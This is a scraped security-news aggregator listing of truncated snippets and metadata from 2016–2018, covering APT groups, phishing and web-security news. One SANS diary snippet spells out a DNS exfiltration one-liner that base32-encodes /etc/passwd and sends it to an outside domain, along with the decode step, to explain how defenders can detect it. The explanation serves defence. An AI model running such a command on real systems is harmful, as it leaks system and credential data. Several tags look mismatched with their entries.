Therefore we’ve limited ourselves below to some very high-level trends for particular threat actors, many of which may not be relevant to your organisation. Which threat actors are most active? The following graph describes the number of vendor reports for each threat actor over the past two years by quarter: For clarity, we have limited the graph to the five threat actors reported on most in OTX. This is useful as a very rough indication of which actors are particularly busy. Caveats: There are a number of caveats to consider here. One newsworthy event against a single target may be reported in multiple vendor reports, whereas a campaign against thousands of targets may be represented by only one report. Vendors are also more inclined to report on something that is “commercially interesting”. For example, activity targeting banks in the United States is more likely to be reported than attacks targeting the Uyghur population in China. It’s also likely we missed some reports, particularly in the earlier days of OTX, which may explain some of the increase in reports between 2016 and 2017. The global targeted threat landscape: There are a number of suggested methods to classify the capability of different threat actors. Each has its problems, however. For example, if a threat actor never deploys 0-day exploits, do they lack the resources to develop them, or are they mature enough to avoid wasting resources unnecessarily? Below we have plotted a graph of the threat actors most reported on in the last two years. We have excluded threat actors whose motivation is thought to be criminal, as that wouldn’t be an apples-to-apples comparison.
Both the measure of their activity (the number of vendor reports) and the measure of their capability (a rough rule of thumb) are not scientific, but can provide some rough insights: A rough chart of the activity and capability of notable threat actors in the last year. Perhaps most notable here is which threat actors are not listed. Some, such as APT1 and Equation Group, seem to have disappeared under their existing formation following very public reporting. It seems unlikely that groups which likely employ thousands of people, such as those, have disappeared completely. The lack of such reporting is more likely a result of significantly changed tactics and identification following their outing. Others remain visibly active, but not enough to make our chart of “worst offenders”. A review of the most reported-on threat actors: The threat actor referenced i 2018-01-30T13:40:00+00:00 http://feeds.feedblitz.com/~/521337082/0/alienvault-blogs~OTX-Trends-Part-Threat-Actors www.secnews.physaphae.fr/article.php?IdArticle=461917 False None APT 38,APT 10,APT 28,APT 3,APT 1,APT 34 None

taosecurity - Chinese Security Blog Remembering When APT Became Public Last week I Tweeted the following on the 8th anniversary of Google's blog post about its compromise by Chinese threat actors: This intrusion made the term APT mainstream. I was the first to associate it with Aurora, in this post https://taosecurity.blogspot.com/2010/01/google-v-china.html My first APT post was a careful reference in 2007, when we all feared being accused of "leaking classified" re China: https://taosecurity.blogspot.com/2007/10/air-force-cyberspace-report.html I should have added the term "publicly" to my original Tweet. There were consultants with years of APT experience involved in the Google incident response, and they recognized the work of APT17 at that company and others.
Those consultants honored their NDAs and have stayed quiet. I wrote my original Tweet as a reminder that "APT" was not a popular, recognized term until the Google announcement on 12 January 2010. In my Google v China blog post I wrote: Welcome to the party, Google. You can use the term "advanced persistent threat" (APT) if you want to give this adversary its proper name. I also Tweeted a similar statement on the same day: This is horrifying: http://bit.ly/7x7vVW Google admits intellectual property theft from China; it's called Advanced Persistent Threat, GOOG I made the explicit link of China and APT because no one had done that publicly. This slide from a 2011 briefing I did in Hawaii captures a few historical points: The Google incident was a watershed, for reasons I blogged on 16 January 2010. I remember the SANS DFIR 2008 event as effectively "APTCon," but beyond Mandiant, Northrop Grumman, and NetWitness, no one was really talking publicly about the APT until after Google. As I noted in the July 2009 blog post, You Down With APT? (ugh): Aside from Northrop Grumman, Mandiant, and a few vendors (like NetWitness, one of the full capture vendors out there) mentioning APT, there's not much else available. A Google search for "advanced persistent threat" -netwitness -mandiant -Northrop yields 34 results (prior to this blog post). (emphasis added) Today that search yields 244,000 results. I would argue we're "past APT." APT was the buzzword for 2018-01-14T14:08:40+00:00 http://taosecurity.blogspot.com/2018/01/remembering-when-apt-became-public.html www.secnews.physaphae.fr/article.php?IdArticle=459740 False None APT 17,APT 1 None

Bleeping Computer - American magazine Google Releases an Updated SEO Starter Guide 2017-12-13T10:05:21+00:00 https://www.bleepingcomputer.com/news/google/google-releases-an-updated-seo-starter-guide/ www.secnews.physaphae.fr/article.php?IdArticle=450112 False None APT 19 None

NoticeBored - Experienced IT Security professional NBlog December 5 - lurid headline The latest issue outlines some of the tricks used by phishers to lure their victims initially. "It is not breaking news that phishing is the leading cause of data breaches in the modern world. It is safe to ask why that is the case though, given how much of this email gets caught up in our spam filters and perimeter defenses. One trick sophisticated attackers use is triggering emotional responses from targets using simple and seemingly innocuous messaging to generate any response at all. Some messaging does not initially employ attachments or links, but instead tries to elicit an actual reply from the target. Once the attackers establish a communication channel and a certain level of trust, either a payload of the attacker's choosing can then be sent or the message itself can entice the target to act." That same technique is used by advertisers over the web in the form of lurid or intriguing headlines and images, carefully crafted to get us to click the links and so dive into a rabbit warren of further items and junk, all the while being inundated with ads. You may even see the lures here or hereabouts (courtesy of Google).
Once you've seen enough of them, you'll recognize the style and spot the trigger words - bizarre, trick, insane, weird, THIS and so on, essentially meaning CLICK HERE, NOW! They are curiously attractive, almost irresistible, even though we've groped around in the rabbit warrens before and suspect or know what we're letting ourselves in for. But why is that? 'Curiously' is the key: it's our natural curiosity that leads us in. It's what led you to read this sentence. Ending the previous paragraph with a rhetorical question was my deliberate choice. Like magpies or trout chasing something shiny, I got you. You fell for it. I manipulated you. Sorry. There are loads more examples along similar lines - random survey statistics for instance ("87% of X prone to Y") and emotive subjects ("Doctors warn Z causes cancer"). We have the newspapers to thank for the very term 'headline', not just the tabloid/gutter press ("Elvis buried on Mars") but the broadsheets and more up-market magazines and journals, even scientific papers. The vast majority of stuff we read has titles and headings, large and bold in style, both literally and figuratively. Postings on this blog all have short titles and a brief summary/description, and some of the more detailed pieces have subheadings providing structure and shortcuts for readers who lack the time or inclination to read every word ... which hints at another issue, information overload.
Today's Web is so vast that we're all sipping from the fire hose. And that 2017-12-05T08:24:37+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/3LVcWWqpfYw/nblog-december-5-lurid-headline.html www.secnews.physaphae.fr/article.php?IdArticle=444167 False Guideline APT 15 None

ZD Net - IT magazine WordPress patches SQL injection bug in security release 2017-11-02T09:19:30+00:00 http://www.zdnet.com/article/wordpress-patches-sql-injection-bug-in-emergency-release/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=427038 False None APT 19 None

Security Affairs - Security Blog Intezer researchers link CCleaner hack to Chinese APT17 hackers 2017-10-04T11:12:03+00:00 http://securityaffairs.co/wordpress/63801/apt/ccleaner-apt17-hackers.html www.secnews.physaphae.fr/article.php?IdArticle=415099 False None APT 17,CCleaner None

01net. News - Security - French magazine CCleaner hack: is China hiding behind this attack? 2017-09-21T08:34:32+00:00 http://www.01net.com/actualites/piratage-ccleaner-la-chine-se-cache-t-elle-derriere-cette-attaque-1261474.html www.secnews.physaphae.fr/article.php?IdArticle=410912 False None APT 17,CCleaner 3.0000000000000000

Security Affairs - Security Blog Viacom left the keys of its digital kingdom on a publicly exposed AWS S3 bucket 2017-09-20T10:49:05+00:00 http://securityaffairs.co/wordpress/63201/data-breach/viacom-data-leak.html www.secnews.physaphae.fr/article.php?IdArticle=410129 False None APT 15 None

Bleeping Computer - American magazine Security.txt Standard Proposed, Similar to Robots.txt 2017-09-15T11:10:39+00:00 https://www.bleepingcomputer.com/news/security/security-txt-standard-proposed-similar-to-robots-txt/ www.secnews.physaphae.fr/article.php?IdArticle=408931 False None APT 19 None

TrendLabs Security - Antivirus vendor ChessMaster Makes its Move: A Look into the Campaign's Cyberespionage Arsenal Trendlabs Security Intelligence Blog - by Trend Micro 2017-07-27T11:30:10+00:00 http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/8XGEVNIxCaU/ www.secnews.physaphae.fr/article.php?IdArticle=389605 False None APT 10 None

Infosec Island - Security Magazine Convenience Comes at a Steep Price: Password Management Systems & SSO 2017-07-12T03:47:02+00:00 https://www.infosecisland.com/blogview/24952-Convenience-Comes-at-a-Steep-Price-Password-Management-Systems-amp-SSO.html www.secnews.physaphae.fr/article.php?IdArticle=383497 False None APT 15 None

Bleeping Computer - American magazine ZIP Bombs Can Protect Websites From Getting Hacked 2017-07-07T10:26:58+00:00 https://www.bleepingcomputer.com/news/security/zip-bombs-can-protect-websites-from-getting-hacked/ www.secnews.physaphae.fr/article.php?IdArticle=382398 False None APT 19 None

ZD Net - IT magazine Let's Encrypt brings free wildcard certificates to the web 2017-07-06T15:30:00+00:00 http://www.zdnet.com/article/lets-encrypt-brings-wildcard-certificates-to-the-web/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=381840 False None APT 19 None

Mandiant - Mandiant security blog Privileges and Credentials: Phished at the Request of Counsel Summary In May and June 2017, FireEye observed a phishing campaign targeting at least seven global law and investment firms. We have associated this campaign with APT19, a group that we assess is composed of freelancers, with some degree of sponsorship by the Chinese government. APT19 used three different techniques to attempt to compromise targets. In early May, the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199. Toward the end of May, APT19 switched to using macro-enabled Microsoft Excel (XLSM) documents.
In the 2017-06-06T17:30:00+00:00 https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel www.secnews.physaphae.fr/article.php?IdArticle=8377775 False Vulnerability APT 19 4.0000000000000000

IT Security Guru - Security Blog Anti-virus defences are leaving global businesses vulnerable to the China syndrome 2017-05-10T08:54:57+00:00 http://www.itsecurityguru.org/2017/05/10/anti-virus-defences-leaving-global-businesses-vulnerable-china-syndrome/ www.secnews.physaphae.fr/article.php?IdArticle=363724 True None APT 10 None

SANS Institute - SANS is a defense and training actor Migrating Telnet to SSH without Migrating, (Thu, May 4th) 2017-05-04T16:20:16+00:00 https://isc.sans.edu/diary.html?storyid=22376&rss www.secnews.physaphae.fr/article.php?IdArticle=362215 False None APT 15 None

Network World - IT magazine Career Watch: Be wary of IT employment contracts Jeffrey Scolaro, an attorney at Daley Mohan Groble PC in Chicago and a member of Legal Services Link, answers questions about employment contracts. Are employment contracts for IT workers negotiable, or are they one-size-fits-all? The axiom that “everything is negotiable” should be where all IT professionals begin their assessment of proposed employment contracts. However, the IT industry in particular can be especially rigid in its collective enforcement of employment agreements. 2017-05-01T05:22:00+00:00 http://www.networkworld.com/article/3193377/careers/career-watch-be-wary-of-it-employment-contracts.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=360462 False None APT 17 None

SANS Institute - SANS is a defense and training actor DNS Query Length... Because Size Does Matter, (Thu, Apr 20th) [1] states that a DNS query length is 255 characters total with each subdomain being 63 characters or less.
By using Base32 encoding [2], we can encode our data in strings compatible with the DNS requirements: A-Z, 0-9 and -:

    $ cat /etc/passwd | base32 -w 63 | while read L; do dig $L.data.rootshell.be @192.168.254.8; done

Note: the parameter -w 63

    $ grep data.rootshell.be queries.log
    20-Apr-2017 08:32:11.075 queries: info: client 172.x.x.x#44635: query: OJXW65B2PA5DAORQHJZG633UHIXXE33POQ5C6YTJNYXWEYLTNAFGIYLFNVXW4OT.data.rootshell.be IN A +E (192.168.254.8)
    20-Apr-2017 08:32:11.113 queries: info: client 172.x.x.X#50081: query: YHIYTUMJ2MRQWK3LPNY5C65LTOIXXGYTJNY5C65LTOIXXGYTJNYXW433MN5TWS3.data.rootshell.be IN A +E (192.168.254.8)
    20-Apr-2017 08:32:11.173 queries: info: client 172.x.x.x#40457: query: QKMJUW4OTYHIZDUMR2MJUW4ORPMJUW4ORPOVZXEL3TMJUW4L3ON5WG6Z3JNYFHG.data.rootshell.be IN A +E (192.168.254.8)
    20-Apr-2017 08:32:11.222 queries: info: client 172.x.x.x#56897: query: 6LTHJ4DUMZ2GM5HG6LTHIXWIZLWHIXXK43SF5ZWE2LOF5XG63DPM5UW4CTTPFXG.data.rootshell.be IN A +E (192.168.254.8)
    20-Apr-2017 08:32:11.276 queries: info: client 172.x.x.x#57339: query: GOTYHI2DUNRVGUZTIOTTPFXGGORPMJUW4ORPMJUW4L3TPFXGGCTHMFWWK4Z2PA5.data.rootshell.be IN A +E (192.168.254.8)
    ...

To decode this on the attacker

    $ grep data.rootshell.be queries.log | cut -d ' ' -f8 | cut -d . -f1 | base32 -d | more
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    ...

We don

    # tcpdump -vvv -s 0 -i eth0 -l -n port 53 | egrep 'A\? .*\.data\.rootshell\.be'
    tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
    172.x.x.x.40335 > 192.168.254.8.53: [udp sum ok] 9843+ [1au] A? OJXW65B2PA5DAORQHJZG633UHIXXE33POQ5C6YTJNYXWEYLTNAFGIYLFNVXW4OT.data.rootshell.be. ar: . OPT UDPsize=4096 (110)
    172.x.x.x.35770 > 192.168.254.8.53: [udp sum ok] 19877+ [1au] A? YHIYTUMJ2MRQWK3LPNY5C65LTOIXXGYTJNY5C65LTOIXXGYTJNYXW433MN5TWS3.data.rootshell.be. ar: . OPT UDPsize=4096 (110)
    172.x.x.x.41463 > 192.168.254.8.53: [udp sum ok] 29267+ [1au] A? QKMJUW4OTYHIZDUMR2MJUW4ORPMJUW4ORPOVZXEL3TMJUW4L3ON5WG6Z3JNYFHG.data.rootshell.be. ar: . OPT UDPsize=4096 (110)
    172.x.x.x.38048 > 192.168.254.8.53: [udp sum ok] 30042+ [1au] A? 6LTHJ4DUMZ2GM5HG6LTHIXWIZLWHIXXK43SF5ZWE2LOF5XG63DPM5UW4CTTPFXG.data.rootshell.be. ar: . OPT UDPsize=4096 (110)
    ...

As you can see, we just used standard DNS requests to exfiltrate data. To detect this, keep an eye on your DNS logs and particularly the query length. The following graph [figure not reproduced] But, as usual, not all big DNS queries are suspicious. Some CDNs

    hxxps://2ecffd01e1ab3e9383f0-07db7b9624bbdf022e3b5395236d5cf8.ssl.cf4.rackcdn.com/Product/178ee827-0671-4f17-b75b-2022963f5980.pdf

To reduce the risk of false positives, this control can be combined with others:
- The volume of traffic per IP
- The volume of traffic per (sub-)domain
- White-lists
This technique is not new but comes back regularly 2017-04-20T07:07:42+00:00 https://isc.sans.edu/diary.html?storyid=22326&rss www.secnews.physaphae.fr/article.php?IdArticle=359221 False None APT 18 None

Korben - French blogger Logitech Keys-To-Go This marvellous and unrivalled article, entitled "Logitech Keys-To-Go", was published on Korben, the only site that loves you more than your parents do.
2017-04-15T11:39:14+00:00 http://feedproxy.google.com/~r/KorbensBlog-UpgradeYourMind/~3/JOYpdYIaNIg/keys-to-go-de-logitech.html www.secnews.physaphae.fr/article.php?IdArticle=358892 False None APT 15 None

Dark Reading - Informationweek Branch China-Based Threat Actor APT10 Ramps Up Cyber Espionage Activity 2017-04-06T19:15:00+00:00 http://www.darkreading.com/attacks-breaches/china-based-threat-actor-apt10-ramps-up-cyber-espionage-activity/d/d-id/1328584?_mc=RSS_DR_EDT www.secnews.physaphae.fr/article.php?IdArticle=355257 False None APT 10 None

Mandiant - Mandiant security blog APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat APT10 Background APT10 (MenuPass Group) is a Chinese cyber espionage group that FireEye has tracked since 2009. They have historically targeted construction and engineering, aerospace, and telecom firms, and governments in the United States, Europe, and Japan. We believe that the targeting of these industries has been in support of Chinese national security goals, including acquiring valuable military and intelligence information as well as the theft of confidential business data to support Chinese corporations. PwC and BAE recently issued a joint blog detailing extensive APT10 activity. 2017-04-06T14:00:00+00:00 https://www.mandiant.com/resources/blog/apt10-menupass-group www.secnews.physaphae.fr/article.php?IdArticle=8377784 False Threat,Technical APT 10,APT 10 4.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, right?) U.S. Trade Group Hacked by Chinese Hackers ahead of Trump-Xi Trade Summit 2017-04-06T11:03:37+00:00 http://feedproxy.google.com/~r/TheHackersNews/~3/4y3dTLA8bok/hacking-trump-xi-trade.html www.secnews.physaphae.fr/article.php?IdArticle=354396 False None APT 10 None

Network World - IT magazine US trade lobbying group attacked by suspected Chinese hackers according to security vendor Fidelis Cybersecurity. The NFTC lobbies for open and fair trade and has pledged to work with U.S. President Donald Trump to "find ways to address Chinese policies that frustrate access to their market and undermine fair trade, while at the same time encouraging a positive trend in our trade relationship." Trump will meet with China President Xi Jinping in Florida this week. 2017-04-06T10:13:00+00:00 http://www.networkworld.com/article/3187846/security/us-trade-lobbying-group-attacked-by-suspected-chinese-hackers.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=354462 False None APT 10 None

Dark Reading - Informationweek Branch Chinese APT10 Hacking Group Suspected of Global Campaign Targeting MSPs 2017-04-05T09:15:00+00:00 http://www.darkreading.com/attacks-breaches/chinese-apt10-hacking-group-suspected-of-global-campaign-targeting-msps/d/d-id/1328563?_mc=RSS_DR_EDT www.secnews.physaphae.fr/article.php?IdArticle=353868 False None APT 10 None

Network World - IT magazine Chinese hackers go after third-party IT suppliers to steal data joint report. That's because these suppliers often have direct access to their client's networks.
APT10 has been found stealing intellectual property as part of a global cyberespionage campaign that ramped up last year, PwC said on Monday. 2017-04-04T13:39:28+00:00 http://www.networkworld.com/article/3187359/security/chinese-hackers-go-after-third-party-it-suppliers-to-steal-data.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=352635 False None APT 10 None

BAE - BAE Systems Threat Research APT10 - Operation Cloud Hopper For many businesses the network now extends to suppliers who provide management of applications, cloud storage, helpdesk, and other functions. With the right integration and service levels, Managed Service Providers (MSPs) can become a key enabler for businesses by allowing them to focus on their core mission while suppliers take care of background tasks. However, the network connectivity which exists between MSPs and their customers also provides a vector for attackers to jump through. Successful global MSPs are even more attractive as they become a hub from which an intruder may access multiple end-victim networks. Since late 2016 we have been investigating a campaign of intrusions against several major MSPs. These attacks can be attributed to the actor known as APT10 (a.k.a. CVNX, Stone Panda, MenuPass, and POTASSIUM). Their activity seems to have increased in mid-2016, and has focused on compromise of MSPs as a stepping stone into victim organisations. Figure 1 – Attack stages for APT10 in targeting MSP end-customers. We have joined forces with PwC to release our findings from investigations into these on-going attacks and raise awareness. This joint analysis report can be found on PwC's blog at: https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html OVERVIEW The current campaign linked to APT10 can be split into two sets of activity:
1. Attacks targeting MSPs, engineering and other sectors with common as well as custom malware;
2. Attacks targeting Japanese organisations with the 'ChChes' malware.
The latter campaign has been well covered in the public domain; however, the MSP targeting is the focus of our joint analysis report with PwC. The group use a custom dropper for their various implants. This dropper makes use of DLL side-loading to execute the main payload. In our analysis the attackers have used several payloads including:
1. PlugX – a well-known espionage tool in use by several threat actors
2. RedLeaves – a newly developed, fully-featured backdoor, first used by APT10 in recent months
INFRASTRUCTURE The C&C domains chosen by the APT10 actors for their MSP-related campaign are predominantly dynamic-DNS domains. The various domains are highly interconnected through shared IP address hosting, even linking back historically to the group's much older operations. The graph below depicts infrastructure used by the attackers in late 2016. Figure 2 – Infrastructure view from late 2016. In recent months the infrastructure has expanded significantly. The nodes number into the thousands and cannot be easily visualised. The below graph represents a linkage between one of the PlugX C&Cs used in the group's newer ope 2017-04-03T18:09:04+00:00 http://baesystemsai.blogspot.com/2017/04/apt10-operation-cloud-hopper_3.html www.secnews.physaphae.fr/article.php?IdArticle=352306 False None APT 10,APT 1 None

UnderNews - French "hacker" news site Hacks – Google's warning for 2017 According to Google, it is now easy for hackers to compromise websites. The reason? Mostly their obsolescence. The American giant is warning webmasters about the dangers for 2017. 2017-03-22T08:29:52+00:00 http://feedproxy.google.com/~r/undernews/oCmA/~3/6Br6NtfrPPA/piratages-lavertissement-de-google-pour-2017.html www.secnews.physaphae.fr/article.php?IdArticle=342843 False None APT 19 None

Dark Reading - Informationweek Branch Hacked Sites Up By 32% in 2016 Over 2015, Says Google 2017-03-21T10:05:00+00:00 http://www.darkreading.com/cloud/hacked-sites-up-by-32--in-2016-over-2015-says-google/d/d-id/1328445?_mc=RSS_DR_EDT www.secnews.physaphae.fr/article.php?IdArticle=342699 False None APT 19 None

AlienVault Blog - AlienVault is a major defense actor in IOCs Interview with Daniel Cid, founder of OSSEC Daniel Cid is the founder and CTO of Sucuri. He’s also on the AlienVault Technology Advisory Board and is the founder of OSSEC HIDS. I interviewed him to get his thoughts on website security, and the security of content management systems (CMS). Q: What are the most serious challenges and trends you are seeing with website security? At a high level, the most popular CMS platforms (e.g. WordPress, Magento, Drupal, etc.) and frameworks are getting a lot better in terms of security, whether it’s secure-by-default configurations or employing more appropriate security coding and best practices. We rarely see major issues in the core of these applications, and even when they do have issues there is a system in place that helps streamline the process of patching environments at scale. The platform that is leading the charge on this is WordPress, and a perfect example of this system is best illustrated with the vulnerability we disclosed in the new REST API. Via their auto-update feature they were able to patch very quickly and effectively millions of sites in a one-week time period. As impactful as these changes are, however, they aren't stopping the attacks and the compromises.
Simply put, it’s not because platform security is the problem, but rather website security is much more complex than code or tools, and needs the people and processes behind it to remain secure. Consider WordPress, for example. They have their famous 5-minute install. What a great message, and it has been huge in achieving their broad user adoption. Note, it actually takes a lot more than 5 minutes to secure and harden the environment, let alone configure it to be fully functional to your liking. That isn’t the message a webmaster wants to receive, and this becomes especially challenging when you take into consideration the technical aptitude of most of today’s webmasters - which is very low. So I think the main challenge I see right now is that there needs to be a level of education to the people deploying websites. There are additional steps that go beyond the basic installation and configuration requirements, and it includes investing some energy into security. These steps need to be more visible, actionable and easier to adopt.
Q: Can just buying products really fix website security? No. Technology alone will never be the solution; just buying a product won’t work at any level of security. Note that we do sell a cloud-based security software (a WAF for websites), but we work very hard to have a dialog with our customers where we try to educate and communicate the importance of people, process and technology in their security posture.
Q: What do you think about OWASP and other organizations that are focused on web application security? I think they are great. They are a powerful resource for developers and security professionals to be more aware of web application security issues.
Q: We hear a lot of fear, uncertainty and doubt (FUD) around WordPress security. What helpful advice could you give our readers who are using WordPress currently?
The problem in the WordPress security space is that the majority of users are not very technical, and there is also a lot of misinformation and disinformation being spre
2017-03-20T13:00:00+00:00 http://feeds.feedblitz.com/~/283151240/0/alienvault-blogs~Interview-with-Daniel-Cid-founder-of-OSSEC www.secnews.physaphae.fr/article.php?IdArticle=340899 False Guideline APT 19 None

taosecurity - Chinese Security Blog
Bejtlich Moves On
Exactly six years ago today I announced that I was joining Mandiant to become the company's first CSO. Today is my last day at FireEye, the company that bought Mandiant at the very end of 2013.

The highlights of my time at Mandiant involved two sets of responsibilities.

First, as CSO, I enjoyed working with my small but superb security team, consisting of Doug Burks, Derek Coulsen, Dani Jackson, and Scott Runnels. They showed that "a small team of A+ players can run circles around a giant team of B and C players."

Second, as a company spokesperson, I survived the one-of-a-kind ride that was the APT1 report. I have to credit our intel and consulting teams for the content, and our marketing and government teams for keeping me pointed in the right direction during the weeks of craziness that ensued.

At FireEye I transitioned to a strategist role because I was spending so much time talking to legislators and administration officials. I enjoyed working with another small but incredibly effective team: government relations. Backed by the combined FireEye-Mandiant intel team, we helped policy makers better understand the digital landscape and, more importantly, what steps to take to mitigate various risks.

Where do I go from here?

Twenty years ago last month I started my first role in the information warfare arena, as an Air Force intelligence officer assigned to Air Intelligence Agency at Security Hill in San Antonio, Texas.
Since that time I've played a small part in the "cyber wars," trying to stop bad guys while empowering good guys.

I've known for several years that my life was heading in a new direction. It took me a while, but now I understand that I am not the same person who used to post hundreds of blog entries per year, and review 50 security books per year, and write security books and articles, and speak to reporters, and testify before Congress, and train thousands of students worldwide.

That mission is accomplished. I have new missions waiting.

My near-term goal is to identify opportunities in the security space which fit with my current interests. These include:

- Promoting open source software to protect organizations of all sizes
- Advising venture capitalists on promising security start-ups
- Helping companies to write more effective security job descriptions and to interview and select the best candidates available

My intermediate-term goal is to continue my Krav Maga training, which I started in January 2016.
My focus is the General Instructor Course pr
2017-03-17T08:00:00+00:00 http://taosecurity.blogspot.com/2017/03/bejtlich-moves-on.html www.secnews.physaphae.fr/article.php?IdArticle=361043 False None APT 1 None

We Live Security - ESET Antivirus Software Publisher
WordPress webmasters urged to upgrade to version 4.73 to patch six security holes
2017-03-07T12:03:12+00:00 http://feedproxy.google.com/~r/eset/blog/~3/MkxK6_DVakw/ www.secnews.physaphae.fr/article.php?IdArticle=329882 False None APT 19 None

SANS Institute - SANS is a defense and training player
RTRBK - Router / Switch / Firewall Backups in PowerShell (tool drop), (Fri, Feb 17th)
NAME,IP,DEVTYPE
cisco_ios_router_or_switch,192.168.12.101,1
cisco_asa,192.168.12.102,2
cisco_wireless_controller,192.168.12.103,3
hp_procurvesw01,192.168.12.104,4
hp_comwaresw01,192.168.12.105,5
pan_firewall_set,192.168.12.106,6
pan_firewall_xml,192.168.12.106,7
The code reads the file as a CSV, and populates a devices variable with the properties devices.name, devices.IP (which can also be a CN or FQDN, it just needs to resolve), and devices.devtype. The 7 device types are covered in the example.in file above.
Note that the Palo Alto is in there twice, devicetype 6 for set
2017-02-17T13:47:01+00:00 https://isc.sans.edu/diary.html?storyid=22079&rss www.secnews.physaphae.fr/article.php?IdArticle=317642 False None APT 15 None

Palo Alto Network - Vendor Site
menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations
2017-02-16T19:00:11+00:00 http://feedproxy.google.com/~r/PaloAltoNetworks/~3/m_xRUo8R3cs/ www.secnews.physaphae.fr/article.php?IdArticle=317019 False None APT 10 None

Bleeping Computer - American Magazine
Google Makes WordPress Site Owners Nervous Due to Confusing Security Alerts
2017-02-09T17:06:50+00:00 https://www.bleepingcomputer.com/news/security/google-makes-wordpress-site-owners-nervous-due-to-confusing-security-alerts/ www.secnews.physaphae.fr/article.php?IdArticle=311104 False None APT 19 3.0000000000000000

ZD Net - Info Magazine
Thousands of WordPress websites defaced through patch failures
2017-02-08T11:41:55+00:00 http://www.zdnet.com/article/thousands-of-wordpress-websites-fall-prey-to-defacement/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=308799 False None APT 19 None

AlienVault Blog - AlienVault is a major defense player in IOCs
The Evolution of Threat Intelligence
Open Threat Exchange (OTX) platform. As a way to say hello, I’ve put down some thoughts on why I was so keen to come work on OTX. A lot has changed since I jumped into cyber security just 5 years ago. First there was the Target breach. Then Sony. OPM. Yahoo. The elections. Between those infamous landmark case studies IT administrators have been battling constant attacks against their own networks. Ransomware trashing network shares. Users clicking “Enable Macros”. Finance teams approving fraudulent wire transactions. The security industry has had to continuously evolve to respond to ever-changing threats.
The Evolution of Threat Intelligence

Back in 2011 an employee of an incident response company was frustrated at the lack of threat intelligence sharing across the industry. So, they leaked the domain names used by the biggest group of attackers to Pastebin. It was a desperate attempt to prevent the mass of attacks the group was committing against both companies and governments. Two years, and hundreds of compromised organisations later, Mandiant released their landmark APT1 report. It was on the very same attackers, still using many of the same domain names.

We’ve come a long way since then. Now security vendors race each other to share new waves of attacks first and government institutions are mandated to do the same. But this has led to other problems. Keeping up with all the reports is in itself a full-time job. And some reports contain false positives that set off security devices like Christmas tree lights.

OTX

From my viewpoint, AlienVault OTX solves these problems by:

- Reducing the manpower and effort organisations require to pull IoCs out of every report.
- The indicators are peer reviewed for problems and fixes are applied almost instantly.
- The information is easy in, easy out with a growing API and list of integrations.
- The power of the massive community that can perform vetted information sharing in a structured format at no cost.

The key for any network like OTX is the community, and so far it’s going strong. Interested in vetted sharing of ransomware indicators? An OTX user has made a group for that. How about importing the indicators into your MISP instance? There's a group for that too. AlienVault has a long history of building community solutions that are available to organisations of all sizes, not just those with the largest security budgets. Some of you may know me from a community project I’ve worked on in my spare time called ThreatCrowd, another open threat intelligence platform.
ThreatCrowd has become used by more people than I could have hoped. It’s been a fun experiment to keep a prototype running for thousands of simultaneous users from a single Linux box! But there are serious limitations to how much I can tack onto a prototype, in my spare time and limited by my own knowledge. I’m looking forward to working with the top-notch team of AlienVault engineers to help enhance OTX and the overall community experience. I’ve only been at AlienVault a few days but I’ve seen there are some awesome enhancements planned to the interface, data-set and integrations. I won’t ruin the surprise! If you’re a user of Thr
2017-01-26T14:00:00+00:00 http://feeds.feedblitz.com/~/263345200/0/alienvault-blogs~The-Evolution-of-Threat-Intelligence www.secnews.physaphae.fr/article.php?IdArticle=300868 False None APT 1,Yahoo None

Hacker Republic - French hacking news site
Good security resolutions for 2017
Tags: Password, Browsing, Adware, Malware, Backup, VPN
*This article was written with the participation of Keltounet*

2016 was marked by several large-scale security incidents. So as not to be the one left holding the bag, here are a few tips so that computing is no longer your worst nightmare.

Complex passwords, different for each service

It can never be repeated enough: every service you use must have a different password, and every password must be made up of at least eight characters, with upper-case letters, lower-case letters, digits and special characters. You do not use the same password for your mailbox as for logging in to Twitter or Facebook or your business applications. Problem: how do you remember them all? Do not hesitate to use a password manager such as KeePass. It will manage the passwords for you; all that will be left for you to define is a single password, a strong one, obviously.
On the website side, some services offer two-factor authentication, which limits the trouble caused by stolen passwords.

Blockers in your browser

Sites covered in advertisements and trackers of every kind are unfortunately still legion. The result: information about your browsing and your lifestyle habits is stored, sold and resold, without you having any say in it, or even being aware of it. So use a good ad blocker, uBlock Origin for example, together with Privacy Badger. Nor should you forget that advertisements can also be a major malware vector.

Verified extensions/modules/applications
2016-12-26T13:30:46+00:00 https://www.hackersrepublic.org/outils/reco-securite-debutants www.secnews.physaphae.fr/article.php?IdArticle=282806 False None Uber,APT 15 None

AlienVault Blog - AlienVault is a major defense player in IOCs
2016 Recap from the Alien Eye in the Sky
Adult Friend Finder
Fling
Mate1
Shadi.com
Muslim Match

Password re-use attacks
Carbonite
Netflix
GoToMyPC
Reddit
TeamViewer
Camelot
Deliveroo
KFC

Healthcare
Banner Health, which impacted 3.7m patients
Turkish state hospitals, 10m patients
Queen Mary Hospital in Hong Kong saw 3,600 records accessed
Al Zahra Private Medical Centre in the UAE had 4,600 records accessed.
Specialist healthcare providers such as the New Jersey Spine Centre, and the
